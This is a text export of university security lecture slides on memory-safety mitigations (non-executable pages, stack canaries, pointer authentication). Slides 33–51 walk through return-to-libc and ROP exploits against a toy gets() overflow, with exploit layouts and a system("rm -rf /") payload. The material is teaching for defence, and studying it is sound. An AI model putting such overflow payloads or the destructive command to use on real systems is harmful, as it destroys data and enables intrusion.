JavaScript isn't enabled in your browser, so this file can't be opened. Enable and reload.

1 of 113

Mitigating Memory Safety Vulnerabilities

CS 161 Fall 2022 - Lecture 4

Computer Science 161

Fall 2022

2 of 113

Announcements

Project 1 is out!

Checkpoint (Q1–Q4) due Friday, September 16th
Everything else + writeup due Friday, September 30th

Homework 1 is due Friday, September 9th
Exam-prep and extended-time discussions start this week
Some discussion and OH times have shifted

Check website calendar for most up-to-date information

Computer Science 161

Fall 2022

3 of 113

Next: Memory Safety Mitigations

Memory-safe languages
Writing memory-safe code
Building secure software
Exploit mitigations

Non-executable pages
Stack canaries
Pointer authentication
Address space layout randomization (ASLR)

Combining mitigations

Computer Science 161

Fall 2022

4 of 113

Today: Defending Against Memory Safety Vulnerabilities

We’ve seen how widespread and dangerous memory safety vulnerabilities can be. Why do these vulnerabilities exist?

Programming languages aren’t designed well for security.
Programmers often aren’t security-aware.
Programmers write code without designing security in from the start.
Programmers are humans. Humans make mistakes.

Computer Science 161

Fall 2022

5 of 113

Today: Defending Against Memory Safety Vulnerabilities

What are some approaches to defending against memory safety vulnerabilities?

Use safer programming languages.
Learn to write memory-safe code.
Use tools for analyzing and patching insecure code.
Add mitigations that make it harder to exploit common vulnerabilities.

Computer Science 161

Fall 2022

6 of 113

Using Memory-Safe Languages

Textbook Chapter 4.1

Computer Science 161

Fall 2022

7 of 113

Today: Defending Against Memory Safety Vulnerabilities

What are some approaches to defending against memory safety vulnerabilities?

Use safer programming languages.
Learn to write memory-safe code.
Use tools for analyzing and patching insecure code.
Add mitigations that make it harder to exploit common vulnerabilities.

Computer Science 161

Fall 2022

8 of 113

Memory-Safe Languages

Memory-safe languages are designed to check bounds and prevent undefined memory accesses
By design, memory-safe languages are not vulnerable to memory safety vulnerabilities

Using a memory-safe language is the only way to stop 100% of memory safety vulnerabilities

Examples: Java, Python, C#, Go, Rust

Most languages besides C, C++, and Objective C

Computer Science 161

Fall 2022

9 of 113

Why Use Non-Memory-Safe Languages?

Most commonly-cited reason: performance
Comparison of memory allocation performance

C and C++ (not memory safe): malloc usually runs in (amortized) constant-time
Java (memory safe): The garbage collector may need to run at any arbitrary point in time, adding a 10–100 ms delay as it cleans up memory

Computer Science 161

Fall 2022

10 of 113

The Cited Reason: The Myth of Performance

For most applications, the performance difference from using a memory-safe language is insignificant

Possible exceptions: Operating systems, high performance games, some embedded systems

C’s improved performance is not a direct result of its security issues

Historically, safer languages were slower, so there was a tradeoff
Today, safe alternatives have comparable performance (e.g. Go and Rust)
Secure C code (with bounds checking) ends up running as quickly as code in a memory-safe language anyway
You don’t need to pick between security and performance: You can have both!

Computer Science 161

Fall 2022

11 of 113

The Cited Reason: The Myth of Performance

Programmer time matters too

You save more time writing code in a memory-safe language than you save in performance

“Slower” memory-safe languages often have libraries that plug into fast, secure, C libraries anyway

Example: NumPy in Python (memory-safe)

Computer Science 161

Fall 2022

12 of 113

The Real Reason: Legacy

Most common actual reason: inertia and legacy
Huge existing code bases are written in C, and building on existing code is easier than starting from scratch

If old code is written in {language}, new code will be written in {language}!

Computer Science 161

Fall 2022

13 of 113

Example of Legacy Code: iPhones

When Apple created the iPhone, they modified their existing OS and environment to run on a phone
Although there may be very little code dating back to 1989 on your iPhone, many of the programming concepts remained!
If you want to write apps on an iPhone, you still often use Objective C
Takeaway: Non-memory-safe languages are still used for legacy reasons

Computer Science 161

Fall 2022

14 of 113

Writing Memory-Safe Code

Textbook Chapter 4.2

Computer Science 161

Fall 2022

15 of 113

Today: Defending Against Memory Safety Vulnerabilities

What are some approaches to defending against memory safety vulnerabilities?

Use safer programming languages.
Learn to write memory-safe code.
Use tools for analyzing and patching insecure code.
Add mitigations that make it harder to exploit common vulnerabilities.

Computer Science 161

Fall 2022

16 of 113

Writing Memory-Safe Code

Defensive programming: Always add checks in your code just in case

Example: Always check a pointer is not null before dereferencing it, even if you’re sure the pointer is going to be valid
Relies on programmer discipline

Use safe libraries

Use functions that check bounds
Example: Use fgets instead of gets
Example: Use strncpy or strlcpy instead of strcpy
Example: Use snprintf instead of sprintf
Relies on programmer discipline or tools that check your program

Computer Science 161

Fall 2022

17 of 113

Writing Memory-Safe Code

Structure user input

Constrain how untrusted sources can interact with the system
Example: When asking a user to input their age, only allow digits (0–9) as inputs

Reason carefully about your code

When writing code, define a set of preconditions, postconditions, and invariants that must be satisfied for the code to be memory-safe
Very tedious and rarely used in practice, so it’s out of scope for this class

Computer Science 161

Fall 2022

18 of 113

Building Secure Software

Textbook Chapter 4.3

Computer Science 161

Fall 2022

19 of 113

Today: Defending Against Memory Safety Vulnerabilities

What are some approaches to defending against memory safety vulnerabilities?

Use safer programming languages.
Learn to write memory-safe code.
Use tools for analyzing and patching insecure code.
Add mitigations that make it harder to exploit common vulnerabilities.

Computer Science 161

Fall 2022

20 of 113

Approaches for Building Secure Software/Systems

Run-time checks

Automatic bounds-checking
May involve performance overhead
Crash if the check fails

Monitor code for run-time misbehavior

Example: Look for illegal calling sequences
Example: Your code never calls execve, but you notice that your code is executing execve
Probably too late by the time you detect it

Contain potential damage

Example: Run system components in sandboxes or virtual machines (VMs)
Think about privilege separation

Computer Science 161

Fall 2022

21 of 113

Approaches for Building Secure Software/Systems

Bug-finding tools

Excellent resource, as long as there aren’t too many false bugs

Code review

Hiring someone to look over your code for memory safety errors
Can be very effective… but also expensive

Vulnerability scanning

Probe your systems for known flaws

Penetration testing (“pen-testing”)

Pay someone to break into your system

Computer Science 161

Fall 2022

22 of 113

Testing for Software Security Issues

How can we test programs for memory safety vulnerabilities?

Fuzz testing: Random inputs
Use tools like Valgrind (tool for detecting memory leaks)
Test corner cases

How do we tell if we’ve found a problem?

Look for a crash or other unexpected behavior

How do we know that we’ve tested enough?

Hard to know, but code-coverage tools can help

Computer Science 161

Fall 2022

23 of 113

Working Towards Secure Systems

Modern software often imports lots of different libraries

Libraries are often updated with security patches
It’s not enough to keep your own code secure: You also need to keep libraries updated with the latest security patches!

What’s hard about patching?

Can require restarting production systems
Can break crucial functionality

Computer Science 161

Fall 2022

24 of 113

Exploit Mitigations

Textbook Chapter 4.4

Computer Science 161

Fall 2022

25 of 113

Today: Defending Against Memory Safety Vulnerabilities

What are some approaches to defending against memory safety vulnerabilities?

Use safer programming languages.
Learn to write memory-safe code.
Use tools for analyzing and patching insecure code.
Add mitigations that make it harder to exploit common vulnerabilities.

Computer Science 161

Fall 2022

26 of 113

Exploit Mitigations

Scenario

Someone has just handed you a large, existing codebase
It’s not written in a memory-safe language, and it wasn’t written with memory safety in mind
How can you protect this code from exploits without having to completely rewrite it?

Exploit mitigations (code hardening): Compiler and runtime defenses that make common exploits harder

Find ways to turn attempted exploits into program crashes
Crashing is safer than exploitation: The attacker can crash our system, but at least they can’t execute arbitrary code
Mitigations are cheap (low overhead) but not free (some costs associated with them)

Computer Science 161

Fall 2022

27 of 113

Recall: Putting Together an Attack

Find a memory safety (e.g. buffer overflow) vulnerability
Write malicious shellcode at a known memory address
Overwrite the RIP with the address of the shellcode
Return from the function
Begin executing malicious shellcode

Computer Science 161

Fall 2022

28 of 113

Recall: Putting Together an Attack

Find a memory safety (e.g. buffer overflow) vulnerability
Write malicious shellcode at a known memory address
Overwrite the RIP with the address of the shellcode
Return from the function
Begin executing malicious shellcode

We can defend against memory safety vulnerabilities by making each of these steps more difficult (or impossible)!

Computer Science 161

Fall 2022

29 of 113

Mitigation: Non-Executable Pages

Textbook Chapter 4.5 & 4.6 & 4.7

Computer Science 161

Fall 2022

30 of 113

Recall: Putting Together an Attack

Find a memory safety (e.g. buffer overflow) vulnerability
Write malicious shellcode at a known memory address
Overwrite the RIP with the address of the shellcode
Return from the function
Begin executing malicious shellcode

Mitigation: Non-executable pages

We can defend against memory safety vulnerabilities by making each of these steps more difficult (or impossible)!

Computer Science 161

Fall 2022

31 of 113

Non-Executable Pages

Idea: Most programs don’t need memory that is both written to and executed, so make portions of memory either executable or writable but not both

Stack, heap, and static data: Writable but not executable
Code: Executable but not writable

Page table entries have a writable bit and an executable bit that can be set to achieve this behavior

Recall page tables from 61C: Converts virtual addresses to physical addresses
Implemented in hardware, so effectively 0 overhead!

Also known as

W^X (write XOR execute)
DEP (Data Execution Prevention, name used by Windows)
No-execute bit (the name of the bit itself)

Computer Science 161

Fall 2022

32 of 113

Subverting Non-Executable Pages

Issue: Non-executable pages doesn’t prevent an attacker from leveraging existing code in memory as part of the exploit
Most programs have many functions loaded into memory that can be used for malicious behavior

Return-to-libc: An exploit technique that overwrites the RIP to jump to a functions in the standard C library (libc) or a common operating system function
Return-oriented programming (ROP): Constructing custom shellcode using pieces of code that already exist in memory

Computer Science 161

Fall 2022

33 of 113

Subverting Non-Executable Pages: Return-to-libc

Recall: Per the x86 calling convention, each program expects arguments to be placed directly above the RIP
Consider the system function, which executes a shell command. We want to execute it like this:

char cmd[] = "rm -rf /";

system(cmd);

Computer Science 161

Fall 2022

34 of 113

Subverting Non-Executable Pages: Return-to-libc

EBP

ESP

...	...	...	...
...	...	...	...
...	...	...	...
...	...	...	...
...	...	...	...
RIP of main
SFP of main
RIP of vulnerable
SFP of vulnerable
name
name
name
name
name
&name (arg to gets)

Exploit:

'A' * 24� + [address of system]

+ 'B' * 4

+ [address of "rm -rf /"]

+ "rm -rf /"

system:

...

vulnerable:

...

call gets� addl $4, %esp

movl %ebp, %esp

popl %ebp

ret

main:

...

call vulnerable

...

EIP

int system(char *command);

void vulnerable(void) {

char name[20];

gets(name);

}

int main(void) {

vulnerable();

return 0;

}

Computer Science 161

Fall 2022

35 of 113

Subverting Non-Executable Pages: Return-to-libc

ESP

...	...	...	...
...	...	...	...
'\0'	...	...	...
'r'	'f'	' '	'/'
'r'	'm'	' '	'-'
[address of "rm -rf /"]
'B'	'B'	'B'	'B'
[address of system]
'A'	'A'	'A'	'A'
'A'	'A'	'A'	'A'
'A'	'A'	'A'	'A'
'A'	'A'	'A'	'A'
'A'	'A'	'A'	'A'
'A'	'A'	'A'	'A'
&name (arg to gets)

Exploit:

'A' * 24� + [address of system]

+ 'B' * 4

+ [address of "rm -rf /"]

+ "rm -rf /"

system:

...

vulnerable:

...

call gets� addl $4, %esp

movl %ebp, %esp

popl %ebp

ret

main:

...

call vulnerable

...

EIP

EBP

int system(char *command);

void vulnerable(void) {

char name[20];

gets(name);

}

int main(void) {

vulnerable();

return 0;

}

Computer Science 161

Fall 2022

36 of 113

Subverting Non-Executable Pages: Return-to-libc

ESP

...	...	...	...
...	...	...	...
'\0'	...	...	...
'r'	'f'	' '	'/'
'r'	'm'	' '	'-'
[address of "rm -rf /"]
'B'	'B'	'B'	'B'
[address of system]
'A'	'A'	'A'	'A'
'A'	'A'	'A'	'A'
'A'	'A'	'A'	'A'
'A'	'A'	'A'	'A'
'A'	'A'	'A'	'A'
'A'	'A'	'A'	'A'
&name (arg to gets)

system:

...

vulnerable:

...

call gets� addl $4, %esp

movl %ebp, %esp

popl %ebp

ret

main:

...

call vulnerable

...

EIP

EBP

int system(char *command);

void vulnerable(void) {

char name[20];

gets(name);

}

int main(void) {

vulnerable();

return 0;

}

Computer Science 161

Fall 2022

37 of 113

Subverting Non-Executable Pages: Return-to-libc

system:

...

vulnerable:

...

call gets� addl $4, %esp

movl %ebp, %esp

popl %ebp

ret

main:

...

call vulnerable

...

ESP

...	...	...	...
...	...	...	...
'\0'	...	...	...
'r'	'f'	' '	'/'
'r'	'm'	' '	'-'
[address of "rm -rf /"]
'B'	'B'	'B'	'B'
[address of system]
'A'	'A'	'A'	'A'
'A'	'A'	'A'	'A'
'A'	'A'	'A'	'A'
'A'	'A'	'A'	'A'
'A'	'A'	'A'	'A'
'A'	'A'	'A'	'A'
&name (arg to gets)

EIP

EBP

int system(char *command);

void vulnerable(void) {

char name[20];

gets(name);

}

int main(void) {

vulnerable();

return 0;

}

Computer Science 161

Fall 2022

38 of 113

Subverting Non-Executable Pages: Return-to-libc

system:

...

vulnerable:

...

call gets� addl $4, %esp

movl %ebp, %esp

popl %ebp

ret

main:

...

call vulnerable

...

ESP

...	...	...	...
...	...	...	...
'\0'	...	...	...
'r'	'f'	' '	'/'
'r'	'm'	' '	'-'
[address of "rm -rf /"]
'B'	'B'	'B'	'B'
[address of system]
'A'	'A'	'A'	'A'
'A'	'A'	'A'	'A'
'A'	'A'	'A'	'A'
'A'	'A'	'A'	'A'
'A'	'A'	'A'	'A'
'A'	'A'	'A'	'A'
&name (arg to gets)

EIP

EBP

int system(char *command);

void vulnerable(void) {

char name[20];

gets(name);

}

int main(void) {

vulnerable();

return 0;

}

Computer Science 161

Fall 2022

39 of 113

Subverting Non-Executable Pages: Return-to-libc

system:

...

vulnerable:

...

call gets� addl $4, %esp

movl %ebp, %esp

popl %ebp

ret

main:

...

call vulnerable

...

ESP

...	...	...	...
...	...	...	...
'\0'	...	...	...
'r'	'f'	' '	'/'
'r'	'm'	' '	'-'
[address of "rm -rf /"]
'B'	'B'	'B'	'B'
[address of system]
'A'	'A'	'A'	'A'
'A'	'A'	'A'	'A'
'A'	'A'	'A'	'A'
'A'	'A'	'A'	'A'
'A'	'A'	'A'	'A'
'A'	'A'	'A'	'A'
&name (arg to gets)

EIP

EBP

We jumped into the system function, and it expects the first argument to be 4 bytes above the ESP: "rm -rf /"!

int system(char *command);

void vulnerable(void) {

char name[20];

gets(name);

}

int main(void) {

vulnerable();

return 0;

}

Computer Science 161

Fall 2022

40 of 113

Subverting Non-Executable Pages: ROP

Instead of executing an existing function, execute your own code by executing different pieces of different code!

We don’t need to jump to the beginning of a function: We can jump into the middle of it to just take the code chunks that we need

Gadget: A small set of assembly instructions that already exist in memory

Gadgets usually end in a ret instruction
Gadgets are usually not full functions

ROP strategy: We write a chain of return addresses starting at the RIP to achieve the behavior we want

Each return address points to a gadget
The gadget executes its instructions and ends with a ret instruction
The ret instruction jumps to the address of the next gadget on the stack

Computer Science 161

Fall 2022

41 of 113

Subverting Non-Executable Pages: ROP

Example: Let’s say our shellcode involves the following sequence:

movl $1, %eax�xorl %eax, %ebx

The following is present in memory:

foo:� ...�<foo+7> addl $4, %esp�<foo+10> xorl %eax, %ebx�<foo+12> ret��bar:� ...�<bar+22> andl $1, %edx�<bar+25> movl $1, %eax�<bar+30> ret

How can we chain returns to run the code sequence we want?

...	...	...	...
...	...	...	...
...	...	...	...
...	...	...	...
...	...	...	...
RIP of main
SFP of main
RIP of vulnerable
SFP of vulnerable
name
name
name
name
name
&name (arg to gets)

Computer Science 161

Fall 2022

42 of 113

Subverting Non-Executable Pages: ROP

Example: Let’s say our shellcode involves the following sequence:

movl $1, %eax�xorl %eax, %ebx

The following is present in memory:

foo:� ...�<foo+7> addl $4, %esp�<foo+10> xorl %eax, %ebx�<foo+12> ret��bar:� ...�<bar+22> andl $1, %edx�<bar+25> movl $1, %eax�<bar+30> ret

How can we chain returns to run the code sequence we want?

...	...	...	...
...	...	...	...
...	...	...	...
...	...	...	...
...	...	...	...
RIP of main
SFP of main
RIP of vulnerable
SFP of vulnerable
name
name
name
name
name
&name (arg to gets)

If we jump 25 bytes after the start of bar then 10 bytes after the start of foo, we get the result we want!

Computer Science 161

Fall 2022

43 of 113

Subverting Non-Executable Pages: ROP

EBP

ESP

...	...	...	...
...	...	...	...
...	...	...	...
...	...	...	...
...	...	...	...
RIP of main
SFP of main
RIP of vulnerable
SFP of vulnerable
name
name
name
name
name
&name (arg to gets)

Exploit:

'A' * 24� + [address of <bar+25>]

+ [address of <foo+10>]

+ ... (more chains)

foo:

addl $4, %esp

xorl %eax, %ebx

ret

bar:

...

andl $1, %edx

movl $1, %eax

ret

vulnerable:

...

call gets� addl $4, %esp

movl %ebp, %esp

popl %ebp

ret

main:

...

call vulnerable

...

EIP

void vulnerable(void) {

char name[20];

gets(name);

}

int main(void) {

vulnerable();

return 0;

}

Computer Science 161

Fall 2022

44 of 113

Subverting Non-Executable Pages: ROP

ESP

Exploit:

'A' * 24� + [address of <bar+25>]

+ [address of <foo+10>]

+ ... (more chains)

foo:

addl $4, %esp

xorl %eax, %ebx

ret

bar:

...

andl $1, %edx

movl $1, %eax

ret

vulnerable:

...

call gets� addl $4, %esp

movl %ebp, %esp

popl %ebp

ret

main:

...

call vulnerable

...

EIP

EBP

void vulnerable(void) {

char name[20];

gets(name);

}

int main(void) {

vulnerable();

return 0;

}

...
[address of ........]
[address of ........]
[address of ........]
[address of ........]
[address of ........]
[address of <foo+10>]
[address of <bar+25>]
'A'	'A'	'A'	'A'
'A'	'A'	'A'	'A'
'A'	'A'	'A'	'A'
'A'	'A'	'A'	'A'
'A'	'A'	'A'	'A'
'A'	'A'	'A'	'A'
&name (arg to gets)

Computer Science 161

Fall 2022

45 of 113

Subverting Non-Executable Pages: ROP

foo:

addl $4, %esp

xorl %eax, %ebx

ret

bar:

...

andl $1, %edx

movl $1, %eax

ret

vulnerable:

...

call gets� addl $4, %esp

movl %ebp, %esp

popl %ebp

ret

main:

...

call vulnerable

...

EIP

void vulnerable(void) {

char name[20];

gets(name);

}

int main(void) {

vulnerable();

return 0;

}

ESP

EBP

...
[address of ........]
[address of ........]
[address of ........]
[address of ........]
[address of ........]
[address of <foo+10>]
[address of <bar+25>]
'A'	'A'	'A'	'A'
'A'	'A'	'A'	'A'
'A'	'A'	'A'	'A'
'A'	'A'	'A'	'A'
'A'	'A'	'A'	'A'
'A'	'A'	'A'	'A'
&name (arg to gets)

Computer Science 161

Fall 2022

46 of 113

Subverting Non-Executable Pages: ROP

...
[address of ........]
[address of ........]
[address of ........]
[address of ........]
[address of ........]
[address of <foo+10>]
[address of <bar+25>]
'A'	'A'	'A'	'A'
'A'	'A'	'A'	'A'
'A'	'A'	'A'	'A'
'A'	'A'	'A'	'A'
'A'	'A'	'A'	'A'
'A'	'A'	'A'	'A'
&name (arg to gets)

foo:

addl $4, %esp

xorl %eax, %ebx

ret

bar:

...

andl $1, %edx

movl $1, %eax

ret

vulnerable:

...

call gets� addl $4, %esp

movl %ebp, %esp

popl %ebp

ret

main:

...

call vulnerable

...

EIP

void vulnerable(void) {

char name[20];

gets(name);

}

int main(void) {

vulnerable();

return 0;

}

ESP

EBP

Computer Science 161

Fall 2022

47 of 113

Subverting Non-Executable Pages: ROP

...
[address of ........]
[address of ........]
[address of ........]
[address of ........]
[address of ........]
[address of <foo+10>]
[address of <bar+25>]
'A'	'A'	'A'	'A'
'A'	'A'	'A'	'A'
'A'	'A'	'A'	'A'
'A'	'A'	'A'	'A'
'A'	'A'	'A'	'A'
'A'	'A'	'A'	'A'
&name (arg to gets)

foo:

addl $4, %esp

xorl %eax, %ebx

ret

bar:

...

andl $1, %edx

movl $1, %eax

ret

vulnerable:

...

call gets� addl $4, %esp

movl %ebp, %esp

popl %ebp

ret

main:

...

call vulnerable

...

EIP

void vulnerable(void) {

char name[20];

gets(name);

}

int main(void) {

vulnerable();

return 0;

}

EBP

ESP

Computer Science 161

Fall 2022

48 of 113

Subverting Non-Executable Pages: ROP

foo:

addl $4, %esp

xorl %eax, %ebx

ret

bar:

...

andl $1, %edx

movl $1, %eax

ret

vulnerable:

...

call gets� addl $4, %esp

movl %ebp, %esp

popl %ebp

ret

main:

...

call vulnerable

...

EIP

void vulnerable(void) {

char name[20];

gets(name);

}

int main(void) {

vulnerable();

return 0;

}

EBP

...
[address of ........]
[address of ........]
[address of ........]
[address of ........]
[address of ........]
[address of <foo+10>]
[address of <bar+25>]
'A'	'A'	'A'	'A'
'A'	'A'	'A'	'A'
'A'	'A'	'A'	'A'
'A'	'A'	'A'	'A'
'A'	'A'	'A'	'A'
'A'	'A'	'A'	'A'
&name (arg to gets)

ESP

Computer Science 161

Fall 2022

49 of 113

Subverting Non-Executable Pages: ROP

foo:

addl $4, %esp

xorl %eax, %ebx

ret

bar:

...

andl $1, %edx

movl $1, %eax

ret

vulnerable:

...

call gets� addl $4, %esp

movl %ebp, %esp

popl %ebp

ret

main:

...

call vulnerable

...

EIP

void vulnerable(void) {

char name[20];

gets(name);

}

int main(void) {

vulnerable();

return 0;

}

EBP

...
[address of ........]
[address of ........]
[address of ........]
[address of ........]
[address of ........]
[address of <foo+10>]
[address of <bar+25>]
'A'	'A'	'A'	'A'
'A'	'A'	'A'	'A'
'A'	'A'	'A'	'A'
'A'	'A'	'A'	'A'
'A'	'A'	'A'	'A'
'A'	'A'	'A'	'A'
&name (arg to gets)

ESP

Computer Science 161

Fall 2022

50 of 113

Subverting Non-Executable Pages: ROP

foo:

addl $4, %esp

xorl %eax, %ebx

ret

bar:

...

andl $1, %edx

movl $1, %eax

ret

vulnerable:

...

call gets� addl $4, %esp

movl %ebp, %esp

popl %ebp

ret

main:

...

call vulnerable

...

EIP

void vulnerable(void) {

char name[20];

gets(name);

}

int main(void) {

vulnerable();

return 0;

}

ESP

EBP

...
[address of ........]
[address of ........]
[address of ........]
[address of ........]
[address of ........]
[address of <foo+10>]
[address of <bar+25>]
'A'	'A'	'A'	'A'
'A'	'A'	'A'	'A'
'A'	'A'	'A'	'A'
'A'	'A'	'A'	'A'
'A'	'A'	'A'	'A'
'A'	'A'	'A'	'A'
&name (arg to gets)

Computer Science 161

Fall 2022

51 of 113

Subverting Non-Executable Pages: ROP

foo:

addl $4, %esp

xorl %eax, %ebx

ret

bar:

...

andl $1, %edx

movl $1, %eax

ret

vulnerable:

...

call gets� addl $4, %esp

movl %ebp, %esp

popl %ebp

ret

main:

...

call vulnerable

...

EIP

void vulnerable(void) {

char name[20];

gets(name);

}

int main(void) {

vulnerable();

return 0;

}

ESP

EBP

The ret instruction always pops off the bottom of the stack, so execution continues based on the chain of addresses!

...
[address of ........]
[address of ........]
[address of ........]
[address of ........]
[address of ........]
[address of <foo+10>]
[address of <bar+25>]
'A'	'A'	'A'	'A'
'A'	'A'	'A'	'A'
'A'	'A'	'A'	'A'
'A'	'A'	'A'	'A'
'A'	'A'	'A'	'A'
'A'	'A'	'A'	'A'
&name (arg to gets)

Computer Science 161

Fall 2022

52 of 113

Subverting Non-Executable Pages: ROP

If the code base is big enough (imports enough libraries), there are usually enough gadgets in memory for you to run any shellcode you want
ROP compilers can automatically generate a ROP chain for you based on a target binary and desired malicious code!
Non-executable pages is not a huge issue for attackers nowadays

Having writable and executable pages makes an attacker’s life easier, but not that much easier

Computer Science 161

Fall 2022

53 of 113

Mitigation: Stack Canaries

Textbook Chapter 4.8 & 4.9

Computer Science 161

Fall 2022

54 of 113

Recall: Putting Together an Attack

Find a memory safety (e.g. buffer overflow) vulnerability
Write malicious shellcode at a known memory address
Overwrite the RIP with the address of the shellcode

Mitigation: Stack canaries

Return from the function
Begin executing malicious shellcode

Mitigation: Non-executable pages

We can defend against memory safety vulnerabilities by making each of these steps more difficult (or impossible)!

Computer Science 161

Fall 2022

55 of 113

Analogy: Canary in a Coal Mine

Miners protect themselves against toxic gas buildup in the mine with a canary

Canary: A small, noisy bird that is sensitive to toxic gas
If toxic gas builds up, the canary dies first
The miners notice that the canary has died and leave the mine

The canary in the coal mine is a sacrificial animal

The miners don’t expect the canary to survive
However, the canary's death is a warning sign that saves the lives of the miners

Takeaway: Let’s put a sacrificial value (a canary) on the stack

The value is not meaningful (we don’t care if it’s preserved)
The code never uses or changes this value
If the value changes, that's a warning sign that somebody is messing with our code!

Computer Science 161

Fall 2022

56 of 113

Stack Canaries

Idea: Add a sacrificial value on the stack, and check if it has been changed

When the program runs, generate a random secret value and save it in the canary storage
In the function prologue, place the canary value on the stack right below the SFP/RIP
In the function epilogue, check the value on the stack and compare it against the value in canary storage

The canary value is never actually used by the function, so if it changes, somebody is probably attacking our system!

Computer Science 161

Fall 2022

57 of 113

Stack Canaries: Properties

A canary value is unique every time the program runs but the same for all functions within a run
A canary value uses a NULL byte as the first byte to mitigate string-based attacks (since it terminates any string before it)

Example: A format string vulnerability with %s might try to print everything on the stack

The null byte in the canary will mitigate the damage by stopping the print earlier.

Computer Science 161

Fall 2022

58 of 113

Stack Canaries

...	...	...	...
...	...	...	...
...	...	...	...
...	...	...	...
...	...	...	...
...	...	...	...
...	...	...	...
RIP of vulnerable
SFP of vulnerable
🐦🐦🐦 canary 🐦🐦🐦
name
name
name
name
name

vulnerable:

pushl %ebp

movl %esp, %ebp

subl $24, %esp

movl ($CANARY_ADDR), %eax # Load canary

movl %eax, -4(%ebp) # Save on stack

...

movl -4(%ebp), %eax # Load stack value

cmpl %eax, ($CANARY_ADDR) # Compare to canary and...

jne canary_failed # ... crash if not equal

movl %ebp, %esp

popl %ebp

ret

void vulnerable(void) {

char name[20];

gets(name);

}

Because the write starts at name, the attacker has to overwrite the canary before the RIP or SFP!

Note: 20 bytes for name + 4 bytes for canary (32-bit architecture)

Computer Science 161

Fall 2022

59 of 113

Stack Canaries: Efficiency

Compiler inserts a few extra instructions, so there is more overhead
In almost all applications, the performance impact is insignificant

Very cheap way to stop lots of common attacks!

Computer Science 161

Fall 2022

60 of 113

Subverting Stack Canaries

Leak the value of the canary: Overwrite the canary with itself
Bypass the value of the canary: Use a random write, not a sequential write
Guess the value of the canary: Brute-force

Computer Science 161

Fall 2022

61 of 113

Subverting Stack Canaries: Leaking the Canary

Any vulnerability that leaks stack memory could be used to leak the canary’s value

Example: Format string vulnerabilities let you print out values on the stack

Once you learn the value of the stack canary, place it in the exploit such that the canary is overwritten with itself, so the value is unchanged!

Computer Science 161

Fall 2022

62 of 113

Subverting Stack Canaries: Bypassing the Canary

Stack canaries stop attacks that write to increasing, consecutive addresses on the stack

On the stack diagram: Writing upwards, with no gaps
Many common functions only write this way, e.g. gets, fgets, fread, etc.

Stack canaries do not stop attacks that write to memory in other ways

An attacker can write around the canary
Example: Format string vulnerabilities let an attacker write to any location in memory
Example: Heap overflows never overwrite a stack canary (they write to the heap)
Example: C++ vtable exploits overwrite the vtable pointer without overwriting the canary

Computer Science 161

Fall 2022

63 of 113

Subverting Stack Canaries: Guessing the Canary

On 32-bit systems: 24 bits to guess

Remember that the first byte (8 bits) is always a NULL byte: 32 - 8 = 24

On 64-bit systems: 56 bits to guess

64 - 8 = 56

Stack canaries are less effective on 32-bit systems since there are only 2²⁴ possibilities (~16 million), which can feasibly be brute-forced

Computer Science 161

Fall 2022

64 of 113

Subverting Stack Canaries: Guessing the Canary

How feasible is guessing the canary?

It depends on your threat model

How are you running the program?

If the program is running on your own computer, you can keep trying with nobody to stop you
If the program is running on a remote server, the server might see you sending the exploit over and over and reject your requests

Does the program have a timeout?

Timeout: A mandatory waiting period after a failed request
No timeout: 10,000 tries per second = 2²⁴ tries in around 30 minutes
0.1 second timeout: 10 tries per second = 2²⁴ tries in around 3 weeks

More complicated timeouts are possible

10 consecutive failures causes a 10-minute timeout: 1 try per minute = 2²⁴ tries in ~32 years!
Exponentially growing timeout (the timeout doubles for each failure): 2²⁴ tries is not happening

Computer Science 161

Fall 2022

65 of 113

Mitigation: Pointer Authentication

Textbook Chapter 4.10

Computer Science 161

Fall 2022

66 of 113

Recall: Putting Together an Attack

Find a memory safety (e.g. buffer overflow) vulnerability
Write malicious shellcode at a known memory address
Overwrite the RIP with the address of the shellcode

Mitigation: Stack canaries
Mitigation: Pointer authentication

Return from the function
Begin executing malicious shellcode

Mitigation: Non-executable pages

We can defend against memory safety vulnerabilities by making each of these steps more difficult (or impossible)!

Computer Science 161

Fall 2022

67 of 113

Reminder: 32-Bit and 64-Bit Processors

32-bit processor: integers and pointers are 32 bits long

Can address 2³² bytes ≈ 4 GB of memory

64-bit processor: integers and pointers are 64 bits long

Can address 2⁶⁴ bytes ≈ 18 exabytes ≈ 18 billion GB of memory
No modern computer can support this much memory
Even the best most modern computers only need 2⁴² bytes ≈ 4 terabytes ≈ 4000 GB of memory
At most 42 bits are needed to address all of memory
22 bits are left unused (the top 22 bits in the address are always 0)

Computer Science 161

Fall 2022

68 of 113

Pointer Authentication

Recall stack canaries: A secret value stored in memory

If the secret value changes, detect an attack
One canary per function on the stack

Idea: Instead of placing the secret value below the pointer, store a value in the pointer itself!

Use the unused bits in a 64-bit address to store a secret value
When storing a pointer in memory, replace the unused bits with a pointer authentication code (PAC)
Before using the pointer in memory, check if the PAC is still valid

If the PAC is invalid, crash the program
If the PAC is valid, restore the unused bits and use the address normally

Includes the RIP, SFP, any other pointers on the stack, and any other pointers outside of the stack (e.g. on the heap)

Computer Science 161

Fall 2022

69 of 113

Pointer Authentication: Properties of the PAC

Each possible address has its own PAC

Example: The PAC for the address 0x000000007ffffec0 is different from the PAC for 0x000000007ffffec4
If an attacker changes the address without changing the PAC, the PAC will no longer be valid

Only someone who knows the CPU’s master secret can generate a PAC for an address

An attacker cannot generate a PAC for their malicious pointer without the master secret
An attacker cannot generate a PAC using a PAC for a different address
Later: We’ll discuss how this algorithm works (MACs in the cryptography unit)

The CPU’s master secret is not accessible to the program

Leaking program memory will not leak the master secret

Contrast with canaries, which can be leaked

Computer Science 161

Fall 2022

70 of 113

Subverting Pointer Authentication

Find a vulnerability to trick the program to generating a PAC for any address
Learn the master secret

The operating system has to set up the secrets: What if there is a vulnerability in the OS?
Workaround: Embed the master secret in the CPU, which can only be used to generate PACs, never read directly

Guess a PAC: Brute-force

Most 64-bit systems use 48 bits for addressing, so there are only 22 bits left for the PAC
2²² bits ≈ 4 million possibilities, so possibly feasible depending on your threat model

Pointer reuse

If the CPU already generated another PAC for another pointer, we can copy that pointer and use it elsewhere

Computer Science 161

Fall 2022

71 of 113

Defenses Against Pointer Reuse

In practice, there are usually multiple master secrets for different types of pointers

ARM uses 5 master secrets: 2 instruction pointer secrets (IA and IB), 2 data pointer secrets (DA and DB), and 1 general-purpose secret (GA)
Instruction pointer secrets are used for pointers to machine instructions (e.g. RIP)
Data pointer secrets are used for pointers to data (e.g. local variables)
Data pointers can’t be reused as instruction pointers, and vice-versa

The CPU can generate a unique PAC for each pointer and “context”

